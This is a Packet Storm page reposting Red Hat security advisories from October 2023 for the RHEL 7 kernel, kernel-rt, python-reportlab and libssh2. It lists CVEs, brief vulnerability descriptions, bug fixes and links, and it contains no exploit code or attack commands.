Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security and bug fix update  
Advisory ID:        RHSA-2023:5622-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5622  
Issue date:         2023-10-10  
Revision:           01  
CVE Names:          CVE-2023-3609  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)

* kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation (CVE-2023-32233)

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* Low memory deadlock with md devices and external (imsm) metadata handling (BZ#1703180)

* cifs: memory leak in smb2_query_symlink (BZ#2166706)

* bnxt_en: panic in bnxt_tx_int Redux (BZ#2175062)

* NFS client loop in BIND_CONN_TO_SESSION (BZ#2219604)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-3609

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5622-01

Red Hat Security Advisory 2023-5621-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include privilege escalation and use-after-free vulnerabilities.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5621.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel-rt security and bug fix updateAdvisory ID:        RHSA-2023:5621-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5621Issue date:         2023-10-10Revision:           01CVE Names:          CVE-2023-3609====================================================================Summary: An update for kernel-rt is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)* kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation (CVE-2023-32233)* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* kernel-rt: update to the latest RHEL7.9.z26 source tree (BZ#2232239)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3609References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5621-01

Red Hat Security Advisory 2023-5616-01 - Python-reportlab is a library used for generation of PDF documents. Issues addressed include a code execution vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5616.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-reportlab security updateAdvisory ID:        RHSA-2023:5616-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5616Issue date:         2023-10-10Revision:           01CVE Names:          CVE-2019-19450====================================================================Summary: An update for python-reportlab is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python-reportlab is a library used for generation of PDF documents.Security Fix(es):* python-reportlab: code injection in paraparser.py allows code execution (CVE-2019-19450)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2019-19450References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5616-01

Red Hat Security Advisory 2023-5615-01 - The libssh2 packages provide a library that implements the SSH2 protocol.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5615.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libssh2 security updateAdvisory ID:        RHSA-2023:5615-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5615Issue date:         2023-10-10Revision:           01CVE Names:          CVE-2020-22218====================================================================Summary: An update for libssh2 is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libssh2 packages provide a library that implements the SSH2 protocol.Security Fix(es):* libssh2: use-of-uninitialized-value in _libssh2_transport_read (CVE-2020-22218)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-22218References:https://access.redhat.com/security/updates/classification/#moderate

Tag

#js